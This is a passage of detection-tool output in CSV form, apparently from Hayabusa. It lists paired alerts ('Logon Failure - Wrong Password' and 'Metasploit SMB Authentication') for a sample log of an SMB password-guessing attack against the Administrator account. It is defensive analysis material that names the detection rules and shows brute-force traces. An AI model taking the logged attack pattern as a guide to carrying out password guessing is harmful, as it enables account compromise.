SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: 
